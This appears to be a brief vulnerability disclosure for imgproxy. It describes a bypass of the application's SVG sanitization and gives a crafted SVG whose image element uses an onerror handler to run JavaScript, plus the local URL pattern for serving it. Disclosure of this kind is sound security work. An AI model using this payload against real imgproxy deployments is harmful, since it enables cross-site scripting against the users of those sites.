In imgproxy application, we bypassed the svg sanitization function. In this way, attacker can craft malicious svg file and run javascript on the application.
Here is the content of the malicious svg file.
<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'>
<image href="1" onerror="alert(1)" />
</svg>
After that you can call this svg file like below.
http://127.0.0.1:8080/unsafe/plain/<svg-file-url>/test.svg